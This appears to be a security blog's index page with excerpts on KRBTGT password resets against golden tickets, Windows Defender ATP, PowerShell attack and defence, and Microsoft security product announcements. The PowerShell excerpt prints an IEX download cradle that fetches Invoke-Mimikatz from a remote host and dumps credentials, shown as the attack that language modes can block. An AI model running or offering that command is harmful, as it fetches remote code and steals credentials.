KRBTGT Account Password Reset – Security risk or operational risk?

Thursday, February 15, 2018

Hi KRBTGT known as Key Distribution Center Service Account object whose Responsible for the service core of Active Directory. Now days we expose to so many cyber-attacks which include query and manipulation on KRBTGT user.   Pretty popular attack is golden ticket. Once an attacker has gained access to the KRBTGT account password hash, The attacker can create Golden Tickets. It is important to understand that any existing Golden Tickets will no longer be validate for use after changing the KRBTGT password twice rapidly. What would cause a lack of use existing tickets and removes the attacker ability to create valid Golden Tickets with their KRBTGT.     KRBTGT Account...
no comments

Windows Security Center – Service Vulnerable on client

Wednesday, February 14, 2018

Hi Microsoft has taken some steps on cyber-attacks in recent years. One of them was knowing how to get detailed and complete information from the client to the cloud, with the ability to know what the unusual actions were taking on the client. Windows Defender Security Center become the solution that manages Windows Defender ATP Client.   The client deployment and management capabilities are among the highest I've come across in all the distribution issues and the ability to disrupt that deployment. Service signature by certificate is the means that Microsoft has chosen to implement in order to prevent the user from interrupting or stopping...
no comments

PowerShell Offensive & Defensive View

Monday, February 12, 2018

Hi As we know PowerShell can be much more than a scripting platform, when it comes to administrative rights. Running unsigned process and scripts will serve the attacker to advance another step in to achieve the objective. Mimikatz and other painful tools detected by Antiviruses and Antimalware spot, but when they bypass , we are expose to one of the suspicious attacks in PowerShell today.   Using IEX cradle to get new file -  is one of them, Simply upload the PS script and run the following:   “IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.1/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds”     PowerShell can limit access to above command by using Language Mode   FullLanguage - permits all language elements...
no comments

Announcing Windows Defender Advanced Threat Protection

Tuesday, March 1, 2016

Hey Today, Microsoft announce the next step in our efforts to protect enterprise customers, with a new service, Windows Defender Advanced Threat Protection, Windows Defender Advanced Threat Protection is powered by a combination of Windows behavioral sensors, cloud based security analytics, threat intelligence, and by tapping into Microsoft’s intelligent security graph. This immense security graph provides big-data security analytics that look across aggregate behaviors to identify anomalies – informed by anonymous information from over 1 billion Windows devices, 2.5 trillion indexed URLs on the Web, 600 million reputation look-ups online, and over 1 million suspicious files detonated every day.     Read More      
tags:
no comments

A complete solution for monitoring and protecting enterprise cloud apps

Sunday, February 28, 2016

Hey Microsoft has a strong, ongoing commitment to help customers stay safe in a world with ever increasing threats from cyber criminals. As Satya announced last year and our Chief Information Security Officer (CISO) reiterated today, Microsoft is making huge investments to help Microsoft's customers stay secure.     Microsoft are excited to announce a new set of security solutions, Microsoft Cloud App Security and Azure AD Identity Protection that together give you a complete solution for monitoring and protecting enterprise cloud apps.     ITP Read More: a complete solution for monitoring and protecting enterprise cloud apps        
tags:
no comments

Microsoft ATA Update 1.5 – new capabilities included

Sunday, December 20, 2015

Hey Check out the following link , These are some of the new capabilities included in Microsoft Advanced Threat Analytics Update 1.5:         http://blogs.technet.com/b/ata/archive/2015/12/17/advanced-threat-analytics-update-1-5-is-here.aspx    
tags:
no comments

Microsoft Advanced Threat Analytics coming next month

Wednesday, July 22, 2015

Hey Microsoft are nearing the finish line. Microsoft Advanced Threat Analytics will be generally available in August 2015:     http://blogs.technet.com/b/ad/archive/2015/07/22/microsoft-advanced-threat-analytics-coming-next-month.aspx  
tags:
no comments

An Inside Look at Cloud Service Provider Security with Mark Russinovich

Thursday, June 25, 2015

Hey A great session from last month Microsoft Ignite 2015 By Mark Russinovich to explain the how security components in cloud services are managed. Mark discusses the shared responsibility from the IT and service provider perspectives. Microsoft also cover real customer examples of Their working with customers to detect tenant breach, correct issues and patch any security vulnerabilities:   https://youtu.be/y8Z_0CEJEQY?list=PLXtHYVsvn_b-ChQPB_3vo0TJs_LffcOrJ&t=0    
tags:
no comments

The Risk of Leaked Credentials and How Microsoft’s Cloud Helps Protect Your Organization

Tuesday, June 23, 2015

Hey Last week the Microsoft Identity and Security Services Division announced another new security report feature is now in preview that helps protect Azure Active Directory Premium customers from the risk associated with leaked credentials.   Read More: http://blogs.microsoft.com/cybertrust/2015/06/18/the-risk-of-leaked-credentials-and-how-microsofts-cloud-helps-protect-your-organization/        
tags:
no comments